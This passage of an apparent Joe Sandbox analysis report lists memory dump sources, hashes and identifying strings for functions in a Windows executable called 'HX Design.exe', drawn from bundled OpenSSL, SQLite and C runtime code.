                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                                      • API String ID: 3568877910-384499812
                                                                                                                                                                                                                                                      • Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                                      • Instruction ID: f4f48fa12e26c3bd6b6a94a3b5a1ea5b769809a1d3ffeceb780607cd060034db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53D13732A09B8292EB6ADF25D5902BD23A4FB54B84F484036DF4D4B7AADF3CE555C310
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                                                                                      • API String ID: 3568877910-1331951588
                                                                                                                                                                                                                                                      • Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                                      • Instruction ID: 5a55758a0f04feb063a55dd5aca00dc627f43d5ffd7f4a5d99e48159fbdd952d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9C17C36A086828AFA6A9A25D5907BD63A4FB84F88F844135DF4D4B7B9CF3CE451C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: string or blob too big
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2803948771
                                                                                                                                                                                                                                                      • Opcode ID: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
                                                                                                                                                                                                                                                      • Instruction ID: eee27bc2ce5b8f2ed0023464cb0462959486ba0407300519ba54ab4a688680df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08918921F8A20396FB68AB159565BB927E4EF80B88F044135DE6D073EADE3EF445C740
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                                      • API String ID: 4225454184-515162456
                                                                                                                                                                                                                                                      • Opcode ID: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                      • Instruction ID: 4ba324f17418856dff885a93c4bea277003cba7be3643e155ba6abbf3ef49bdd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C81CD72B0A65786EB54EB11E468EB977E5FB44B84F858032DE6C476E8EF38E541C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2451720372
                                                                                                                                                                                                                                                      • Opcode ID: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
                                                                                                                                                                                                                                                      • Instruction ID: 6d6635ca6bbd39af5dad9021a5b83420dc37554f64a0cd83f3d6a5541f178f8a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B971B322B4AA4392EB15AF2185607B963E0EF54BA4F585231DE3C072E9DF3CE295C340
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: index '%q'
                                                                                                                                                                                                                                                      • API String ID: 0-1628151297
                                                                                                                                                                                                                                                      • Opcode ID: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
                                                                                                                                                                                                                                                      • Instruction ID: 2a79508bf7b7b6945a0ed03fbda9b8628b488a24c284b4e29d8a30d26b9cc920
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D719F32F19656CEEB10AB65D860ABC3BB0BB48B58F040635DE2E57BECDF7895458700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %02d
                                                                                                                                                                                                                                                      • API String ID: 4225454184-896308400
                                                                                                                                                                                                                                                      • Opcode ID: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
                                                                                                                                                                                                                                                      • Instruction ID: 680d2eb0b95e5eb7b6a4c6365c5e521cc6bba27e5fe86b8360c4c162eb1da572
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA71CF32B1969786EB208B66E460BFD7760FB84748F104035EEAD57AADDF39E445CB00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFB37D93A,?,?,?,00007FFDFB37DCFB), ref: 00007FFDFB37D8A7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: CRE$INS
                                                                                                                                                                                                                                                      • API String ID: 4225454184-4116259516
                                                                                                                                                                                                                                                      • Opcode ID: ce2989f60ac5e8a8cae162af8014ecdc409c5b87f6a41c36f512a7284888e5ab
                                                                                                                                                                                                                                                      • Instruction ID: 808ba07a9f50de61730df38e62c8f1bad97f387447c7312f9cdb16ebf8f2d6a0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce2989f60ac5e8a8cae162af8014ecdc409c5b87f6a41c36f512a7284888e5ab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97517C65B4E68392EB61AB16A460A7963E1EF80FC4F684235CD7D477EDDE2CE4018300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007B6570
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                                                      • API String ID: 4069847057-118859582
                                                                                                                                                                                                                                                      • Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                                      • Instruction ID: 10b9ae61c0421b03f42d5ff7597e3660aee59a5151078850dcdf68e5be7de704
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B518121B0D64396FA539726A8143FE5391AF48B94F584432DF0D477EEDE3DE8828700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                      • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                      • Instruction ID: 06acb41969bff98b8cf1a810aefbbc501edfce859f636a530e9ecd1182c6261c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8414822A0828266FB60BB65D40137BEFA0EF90BA4F944235EF5C06AD5DFBCD445DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF732079046
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: HeapFree.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73206CBA5), ref: 00007FF732079064
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                      • API String ID: 3580290477-898117248
                                                                                                                                                                                                                                                      • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                      • Instruction ID: 5393ec9a557832e947cf457e9475c331e447da74764146fa45b56320814ce413
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F41A032A08B46A9EB54FF29D4400BDA3A4EF447D0BD54035E98D43B85DF7CE4A9E360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                      • Instruction ID: c988a1df6911ca3dc0b333fb9211893b91e4159cc8f7deeba8f837b968dc4f28
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F741F532B18A8191EB60EF29E4443BAA7A0FB88784FC04131EE4D87B98EF7CD405D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                      • Instruction ID: 6dd808fc768c6a01ab546fad88f899a449c12a28a58e265e4f43b54e271ed62c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F418F21F0F693C6F7118B26AA709767390AF45788F04493ADC6D422FDDF3CA292C644
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
